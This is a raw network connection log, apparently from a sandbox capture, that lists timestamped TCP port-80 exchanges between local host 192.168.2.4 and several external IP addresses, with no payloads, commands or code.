Aug 2, 2024 13:41:57.333375931 CEST	80	49742	162.254.38.5	192.168.2.4
Aug 2, 2024 13:41:57.333674908 CEST	80	49742	162.254.38.5	192.168.2.4
Aug 2, 2024 13:41:57.333748102 CEST	49742	80	192.168.2.4	162.254.38.5
Aug 2, 2024 13:41:58.240186930 CEST	49742	80	192.168.2.4	162.254.38.5
Aug 2, 2024 13:41:59.279686928 CEST	49743	80	192.168.2.4	162.254.38.5
Aug 2, 2024 13:41:59.285152912 CEST	80	49743	162.254.38.5	192.168.2.4
Aug 2, 2024 13:41:59.285264015 CEST	49743	80	192.168.2.4	162.254.38.5
Aug 2, 2024 13:41:59.307998896 CEST	49743	80	192.168.2.4	162.254.38.5
Aug 2, 2024 13:41:59.313359976 CEST	80	49743	162.254.38.5	192.168.2.4
Aug 2, 2024 13:41:59.909565926 CEST	80	49743	162.254.38.5	192.168.2.4
Aug 2, 2024 13:41:59.909677029 CEST	80	49743	162.254.38.5	192.168.2.4
Aug 2, 2024 13:41:59.909828901 CEST	49743	80	192.168.2.4	162.254.38.5
Aug 2, 2024 13:42:00.827749968 CEST	49743	80	192.168.2.4	162.254.38.5
Aug 2, 2024 13:42:01.857604027 CEST	49744	80	192.168.2.4	162.254.38.5
Aug 2, 2024 13:42:01.862658024 CEST	80	49744	162.254.38.5	192.168.2.4
Aug 2, 2024 13:42:01.862996101 CEST	49744	80	192.168.2.4	162.254.38.5
Aug 2, 2024 13:42:01.895291090 CEST	49744	80	192.168.2.4	162.254.38.5
Aug 2, 2024 13:42:01.900372982 CEST	80	49744	162.254.38.5	192.168.2.4
Aug 2, 2024 13:42:01.900388002 CEST	80	49744	162.254.38.5	192.168.2.4
Aug 2, 2024 13:42:01.900398970 CEST	80	49744	162.254.38.5	192.168.2.4
Aug 2, 2024 13:42:01.900408983 CEST	80	49744	162.254.38.5	192.168.2.4
Aug 2, 2024 13:42:01.900456905 CEST	80	49744	162.254.38.5	192.168.2.4
Aug 2, 2024 13:42:01.900469065 CEST	80	49744	162.254.38.5	192.168.2.4
Aug 2, 2024 13:42:01.900480032 CEST	80	49744	162.254.38.5	192.168.2.4
Aug 2, 2024 13:42:01.900521040 CEST	80	49744	162.254.38.5	192.168.2.4
Aug 2, 2024 13:42:01.900540113 CEST	80	49744	162.254.38.5	192.168.2.4
Aug 2, 2024 13:42:02.640551090 CEST	80	49744	162.254.38.5	192.168.2.4
Aug 2, 2024 13:42:02.642460108 CEST	80	49744	162.254.38.5	192.168.2.4
Aug 2, 2024 13:42:02.642633915 CEST	49744	80	192.168.2.4	162.254.38.5
Aug 2, 2024 13:42:03.412024975 CEST	49744	80	192.168.2.4	162.254.38.5
Aug 2, 2024 13:42:04.447788954 CEST	49745	80	192.168.2.4	162.254.38.5
Aug 2, 2024 13:42:04.453681946 CEST	80	49745	162.254.38.5	192.168.2.4
Aug 2, 2024 13:42:04.453883886 CEST	49745	80	192.168.2.4	162.254.38.5
Aug 2, 2024 13:42:04.473936081 CEST	49745	80	192.168.2.4	162.254.38.5
Aug 2, 2024 13:42:04.478904009 CEST	80	49745	162.254.38.5	192.168.2.4
Aug 2, 2024 13:42:05.078047037 CEST	80	49745	162.254.38.5	192.168.2.4
Aug 2, 2024 13:42:05.078152895 CEST	80	49745	162.254.38.5	192.168.2.4
Aug 2, 2024 13:42:05.078383923 CEST	49745	80	192.168.2.4	162.254.38.5
Aug 2, 2024 13:42:05.090868950 CEST	49745	80	192.168.2.4	162.254.38.5
Aug 2, 2024 13:42:05.096276999 CEST	80	49745	162.254.38.5	192.168.2.4
Aug 2, 2024 13:42:18.765233040 CEST	49746	80	192.168.2.4	103.71.177.176
Aug 2, 2024 13:42:18.770210028 CEST	80	49746	103.71.177.176	192.168.2.4
Aug 2, 2024 13:42:18.770313025 CEST	49746	80	192.168.2.4	103.71.177.176
Aug 2, 2024 13:42:18.812238932 CEST	49746	80	192.168.2.4	103.71.177.176
Aug 2, 2024 13:42:18.817701101 CEST	80	49746	103.71.177.176	192.168.2.4
Aug 2, 2024 13:42:19.718827963 CEST	80	49746	103.71.177.176	192.168.2.4
Aug 2, 2024 13:42:19.719439983 CEST	80	49746	103.71.177.176	192.168.2.4
Aug 2, 2024 13:42:19.719718933 CEST	49746	80	192.168.2.4	103.71.177.176
Aug 2, 2024 13:42:20.318412066 CEST	49746	80	192.168.2.4	103.71.177.176
Aug 2, 2024 13:42:21.358839035 CEST	49747	80	192.168.2.4	103.71.177.176
Aug 2, 2024 13:42:21.364432096 CEST	80	49747	103.71.177.176	192.168.2.4
Aug 2, 2024 13:42:21.364511967 CEST	49747	80	192.168.2.4	103.71.177.176
Aug 2, 2024 13:42:21.390559912 CEST	49747	80	192.168.2.4	103.71.177.176
Aug 2, 2024 13:42:21.395659924 CEST	80	49747	103.71.177.176	192.168.2.4
Aug 2, 2024 13:42:22.289268970 CEST	80	49747	103.71.177.176	192.168.2.4
Aug 2, 2024 13:42:22.289408922 CEST	80	49747	103.71.177.176	192.168.2.4
Aug 2, 2024 13:42:22.289602995 CEST	49747	80	192.168.2.4	103.71.177.176
Aug 2, 2024 13:42:22.897010088 CEST	49747	80	192.168.2.4	103.71.177.176
Aug 2, 2024 13:42:23.949882984 CEST	49748	80	192.168.2.4	103.71.177.176
Aug 2, 2024 13:42:23.954927921 CEST	80	49748	103.71.177.176	192.168.2.4
Aug 2, 2024 13:42:23.955399036 CEST	49748	80	192.168.2.4	103.71.177.176
Aug 2, 2024 13:42:23.980734110 CEST	49748	80	192.168.2.4	103.71.177.176
Aug 2, 2024 13:42:23.985743999 CEST	80	49748	103.71.177.176	192.168.2.4
Aug 2, 2024 13:42:23.985790968 CEST	80	49748	103.71.177.176	192.168.2.4
Aug 2, 2024 13:42:23.985805988 CEST	80	49748	103.71.177.176	192.168.2.4
Aug 2, 2024 13:42:23.985819101 CEST	80	49748	103.71.177.176	192.168.2.4
Aug 2, 2024 13:42:23.985843897 CEST	80	49748	103.71.177.176	192.168.2.4
Aug 2, 2024 13:42:23.985856056 CEST	80	49748	103.71.177.176	192.168.2.4
Aug 2, 2024 13:42:23.985881090 CEST	80	49748	103.71.177.176	192.168.2.4
Aug 2, 2024 13:42:23.985893965 CEST	80	49748	103.71.177.176	192.168.2.4
Aug 2, 2024 13:42:23.985929012 CEST	80	49748	103.71.177.176	192.168.2.4
Aug 2, 2024 13:42:24.891772032 CEST	80	49748	103.71.177.176	192.168.2.4
Aug 2, 2024 13:42:24.891869068 CEST	80	49748	103.71.177.176	192.168.2.4
Aug 2, 2024 13:42:24.891933918 CEST	49748	80	192.168.2.4	103.71.177.176
Aug 2, 2024 13:42:25.490639925 CEST	49748	80	192.168.2.4	103.71.177.176
Aug 2, 2024 13:42:26.531106949 CEST	49749	80	192.168.2.4	103.71.177.176
Aug 2, 2024 13:42:26.536045074 CEST	80	49749	103.71.177.176	192.168.2.4
Aug 2, 2024 13:42:26.539302111 CEST	49749	80	192.168.2.4	103.71.177.176
Aug 2, 2024 13:42:26.559092999 CEST	49749	80	192.168.2.4	103.71.177.176
Aug 2, 2024 13:42:26.564147949 CEST	80	49749	103.71.177.176	192.168.2.4
Aug 2, 2024 13:42:27.430605888 CEST	80	49749	103.71.177.176	192.168.2.4
Aug 2, 2024 13:42:27.430685997 CEST	80	49749	103.71.177.176	192.168.2.4
Aug 2, 2024 13:42:27.430804968 CEST	49749	80	192.168.2.4	103.71.177.176
Aug 2, 2024 13:42:27.441939116 CEST	49749	80	192.168.2.4	103.71.177.176
Aug 2, 2024 13:42:27.446841002 CEST	80	49749	103.71.177.176	192.168.2.4
Aug 2, 2024 13:42:32.701620102 CEST	49750	80	192.168.2.4	66.235.200.145
Aug 2, 2024 13:42:32.706619978 CEST	80	49750	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:32.706697941 CEST	49750	80	192.168.2.4	66.235.200.145
Aug 2, 2024 13:42:32.731637001 CEST	49750	80	192.168.2.4	66.235.200.145
Aug 2, 2024 13:42:32.737180948 CEST	80	49750	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:33.330017090 CEST	80	49750	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:33.330077887 CEST	80	49750	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:33.330127001 CEST	49750	80	192.168.2.4	66.235.200.145
Aug 2, 2024 13:42:33.330482960 CEST	80	49750	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:33.330538988 CEST	49750	80	192.168.2.4	66.235.200.145
Aug 2, 2024 13:42:34.243124008 CEST	49750	80	192.168.2.4	66.235.200.145
Aug 2, 2024 13:42:35.290258884 CEST	49751	80	192.168.2.4	66.235.200.145
Aug 2, 2024 13:42:35.297868967 CEST	80	49751	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:35.297945023 CEST	49751	80	192.168.2.4	66.235.200.145
Aug 2, 2024 13:42:35.325066090 CEST	49751	80	192.168.2.4	66.235.200.145
Aug 2, 2024 13:42:35.330322981 CEST	80	49751	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:35.908802032 CEST	80	49751	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:35.908838987 CEST	80	49751	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:35.909012079 CEST	49751	80	192.168.2.4	66.235.200.145
Aug 2, 2024 13:42:35.909110069 CEST	80	49751	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:35.909214973 CEST	49751	80	192.168.2.4	66.235.200.145
Aug 2, 2024 13:42:36.834597111 CEST	49751	80	192.168.2.4	66.235.200.145
Aug 2, 2024 13:42:37.871129990 CEST	49752	80	192.168.2.4	66.235.200.145
Aug 2, 2024 13:42:37.876903057 CEST	80	49752	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:37.877015114 CEST	49752	80	192.168.2.4	66.235.200.145
Aug 2, 2024 13:42:37.903157949 CEST	49752	80	192.168.2.4	66.235.200.145
Aug 2, 2024 13:42:38.207317114 CEST	49752	80	192.168.2.4	66.235.200.145
Aug 2, 2024 13:42:38.301274061 CEST	80	49752	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:38.301698923 CEST	80	49752	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:38.301752090 CEST	80	49752	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:38.301784039 CEST	80	49752	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:38.301795006 CEST	49752	80	192.168.2.4	66.235.200.145
Aug 2, 2024 13:42:38.301837921 CEST	80	49752	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:38.301873922 CEST	80	49752	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:38.301881075 CEST	49752	80	192.168.2.4	66.235.200.145
Aug 2, 2024 13:42:38.301925898 CEST	80	49752	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:38.301959991 CEST	80	49752	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:38.302030087 CEST	80	49752	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:38.302083015 CEST	80	49752	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:38.313174963 CEST	80	49752	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:38.313241959 CEST	80	49752	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:38.313277960 CEST	80	49752	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:38.313378096 CEST	80	49752	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:38.313410997 CEST	80	49752	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:38.313514948 CEST	80	49752	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:38.313539982 CEST	80	49752	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:38.562310934 CEST	80	49752	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:38.562392950 CEST	80	49752	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:38.562673092 CEST	80	49752	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:38.562730074 CEST	49752	80	192.168.2.4	66.235.200.145
Aug 2, 2024 13:42:38.562730074 CEST	49752	80	192.168.2.4	66.235.200.145
Aug 2, 2024 13:42:39.412642002 CEST	49752	80	192.168.2.4	66.235.200.145
Aug 2, 2024 13:42:40.453928947 CEST	49753	80	192.168.2.4	66.235.200.145
Aug 2, 2024 13:42:40.458772898 CEST	80	49753	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:40.459412098 CEST	49753	80	192.168.2.4	66.235.200.145
Aug 2, 2024 13:42:40.479182005 CEST	49753	80	192.168.2.4	66.235.200.145
Aug 2, 2024 13:42:40.484069109 CEST	80	49753	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:41.072725058 CEST	80	49753	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:41.072941065 CEST	80	49753	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:41.072989941 CEST	49753	80	192.168.2.4	66.235.200.145
Aug 2, 2024 13:42:41.083970070 CEST	49753	80	192.168.2.4	66.235.200.145
Aug 2, 2024 13:42:41.088861942 CEST	80	49753	66.235.200.145	192.168.2.4
Aug 2, 2024 13:42:46.591401100 CEST	49754	80	192.168.2.4	162.241.148.243
Aug 2, 2024 13:42:46.598581076 CEST	80	49754	162.241.148.243	192.168.2.4
Aug 2, 2024 13:42:46.598721027 CEST	49754	80	192.168.2.4	162.241.148.243
Aug 2, 2024 13:42:46.623353004 CEST	49754	80	192.168.2.4	162.241.148.243
Aug 2, 2024 13:42:46.629472971 CEST	80	49754	162.241.148.243	192.168.2.4
Aug 2, 2024 13:42:47.191165924 CEST	80	49754	162.241.148.243	192.168.2.4
Aug 2, 2024 13:42:47.191266060 CEST	80	49754	162.241.148.243	192.168.2.4
Aug 2, 2024 13:42:47.191323996 CEST	49754	80	192.168.2.4	162.241.148.243
Aug 2, 2024 13:42:48.131376982 CEST	49754	80	192.168.2.4	162.241.148.243
Aug 2, 2024 13:42:49.171318054 CEST	49755	80	192.168.2.4	162.241.148.243
Aug 2, 2024 13:42:49.176422119 CEST	80	49755	162.241.148.243	192.168.2.4
Aug 2, 2024 13:42:49.176518917 CEST	49755	80	192.168.2.4	162.241.148.243
Aug 2, 2024 13:42:49.202236891 CEST	49755	80	192.168.2.4	162.241.148.243
Aug 2, 2024 13:42:49.207247019 CEST	80	49755	162.241.148.243	192.168.2.4
Aug 2, 2024 13:42:49.767559052 CEST	80	49755	162.241.148.243	192.168.2.4
Aug 2, 2024 13:42:49.768085957 CEST	80	49755	162.241.148.243	192.168.2.4
Aug 2, 2024 13:42:49.768237114 CEST	49755	80	192.168.2.4	162.241.148.243
Aug 2, 2024 13:42:50.709945917 CEST	49755	80	192.168.2.4	162.241.148.243
Aug 2, 2024 13:42:51.745321035 CEST	49756	80	192.168.2.4	162.241.148.243
Aug 2, 2024 13:42:51.750436068 CEST	80	49756	162.241.148.243	192.168.2.4
Aug 2, 2024 13:42:51.750718117 CEST	49756	80	192.168.2.4	162.241.148.243
Aug 2, 2024 13:42:51.783226967 CEST	49756	80	192.168.2.4	162.241.148.243
Aug 2, 2024 13:42:51.788357973 CEST	80	49756	162.241.148.243	192.168.2.4
Aug 2, 2024 13:42:51.788369894 CEST	80	49756	162.241.148.243	192.168.2.4
Aug 2, 2024 13:42:51.788384914 CEST	80	49756	162.241.148.243	192.168.2.4
Aug 2, 2024 13:42:51.788397074 CEST	80	49756	162.241.148.243	192.168.2.4
Aug 2, 2024 13:42:51.788419962 CEST	80	49756	162.241.148.243	192.168.2.4
Aug 2, 2024 13:42:51.788506031 CEST	80	49756	162.241.148.243	192.168.2.4
Aug 2, 2024 13:42:51.788517952 CEST	80	49756	162.241.148.243	192.168.2.4
Aug 2, 2024 13:42:51.788530111 CEST	80	49756	162.241.148.243	192.168.2.4
Aug 2, 2024 13:42:51.788547039 CEST	80	49756	162.241.148.243	192.168.2.4
Aug 2, 2024 13:42:52.356398106 CEST	80	49756	162.241.148.243	192.168.2.4
Aug 2, 2024 13:42:52.357152939 CEST	80	49756	162.241.148.243	192.168.2.4
Aug 2, 2024 13:42:52.357367039 CEST	49756	80	192.168.2.4	162.241.148.243
Aug 2, 2024 13:42:53.289275885 CEST	49756	80	192.168.2.4	162.241.148.243
Aug 2, 2024 13:42:54.323824883 CEST	49757	80	192.168.2.4	162.241.148.243
Aug 2, 2024 13:42:54.328798056 CEST	80	49757	162.241.148.243	192.168.2.4
Aug 2, 2024 13:42:54.328891993 CEST	49757	80	192.168.2.4	162.241.148.243
Aug 2, 2024 13:42:54.350157976 CEST	49757	80	192.168.2.4	162.241.148.243
Aug 2, 2024 13:42:54.355055094 CEST	80	49757	162.241.148.243	192.168.2.4
Aug 2, 2024 13:42:55.551388979 CEST	80	49757	162.241.148.243	192.168.2.4
Aug 2, 2024 13:42:55.551409960 CEST	80	49757	162.241.148.243	192.168.2.4
Aug 2, 2024 13:42:55.551419020 CEST	80	49757	162.241.148.243	192.168.2.4
Aug 2, 2024 13:42:55.551567078 CEST	49757	80	192.168.2.4	162.241.148.243
Aug 2, 2024 13:42:55.554328918 CEST	80	49757	162.241.148.243	192.168.2.4
Aug 2, 2024 13:42:55.554398060 CEST	49757	80	192.168.2.4	162.241.148.243
Aug 2, 2024 13:42:55.565114021 CEST	49757	80	192.168.2.4	162.241.148.243
Aug 2, 2024 13:42:55.575556040 CEST	80	49757	162.241.148.243	192.168.2.4
Aug 2, 2024 13:43:01.250588894 CEST	49758	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:01.256860018 CEST	80	49758	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:01.256923914 CEST	49758	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:01.282272100 CEST	49758	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:01.287717104 CEST	80	49758	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:02.167483091 CEST	80	49758	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:02.167628050 CEST	80	49758	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:02.167721987 CEST	49758	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:02.789699078 CEST	49758	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:03.829236031 CEST	49759	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:03.834297895 CEST	80	49759	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:03.839421988 CEST	49759	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:03.862335920 CEST	49759	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:03.867317915 CEST	80	49759	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:04.739828110 CEST	80	49759	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:04.739932060 CEST	80	49759	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:04.740010023 CEST	49759	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:05.365863085 CEST	49759	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:06.399627924 CEST	49760	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:06.404571056 CEST	80	49760	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:06.407332897 CEST	49760	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:06.431287050 CEST	49760	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:06.436358929 CEST	80	49760	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:06.436379910 CEST	80	49760	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:06.436398029 CEST	80	49760	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:06.436423063 CEST	80	49760	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:06.436446905 CEST	80	49760	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:06.436460018 CEST	80	49760	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:06.436475992 CEST	80	49760	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:06.436511040 CEST	80	49760	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:06.436525106 CEST	80	49760	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:07.305144072 CEST	80	49760	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:07.305200100 CEST	49760	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:07.944132090 CEST	49760	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:07.949224949 CEST	80	49760	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:09.067270041 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:09.072977066 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:09.073065042 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:09.099091053 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:09.104454041 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:09.991276026 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:09.991308928 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:09.991324902 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:09.991342068 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:09.991358042 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:09.991374969 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:09.991389990 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:09.991405010 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:09.991405010 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:09.991420031 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:09.991430044 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:09.991508007 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:09.991508961 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:09.996515036 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:09.996541977 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:09.996694088 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.211173058 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.211194992 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.211211920 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.211236954 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.211251974 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.211291075 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.211364031 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.211381912 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.211397886 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.211405039 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.211455107 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.212213039 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.212254047 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.212277889 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.212295055 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.212312937 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.212439060 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.212990046 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.213175058 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.213198900 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.213215113 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.213224888 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.213232040 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.213279963 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.213855982 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.213882923 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.213898897 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.213974953 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.213974953 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.214147091 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.216386080 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.271275997 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.302678108 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.302697897 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.302913904 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.465131044 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.465171099 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.465183020 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.465204954 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.465219021 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.465230942 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.465414047 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.465414047 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.465490103 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.465513945 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.465528011 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.465605021 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.465637922 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.465959072 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.466001987 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.466015100 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.466032028 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.466068983 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.466083050 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.466094971 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.466130972 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.466209888 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.466732979 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.466936111 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.466993093 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.467005968 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.467030048 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.467097044 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.467111111 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.467124939 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.467125893 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.467216015 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.467693090 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.467864037 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.467875957 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.467889071 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.467906952 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.467921972 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.467940092 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.467955112 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.467969894 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.468519926 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.468533039 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.468544960 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.468573093 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.468607903 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.468627930 CEST	80	49761	103.42.108.46	192.168.2.4
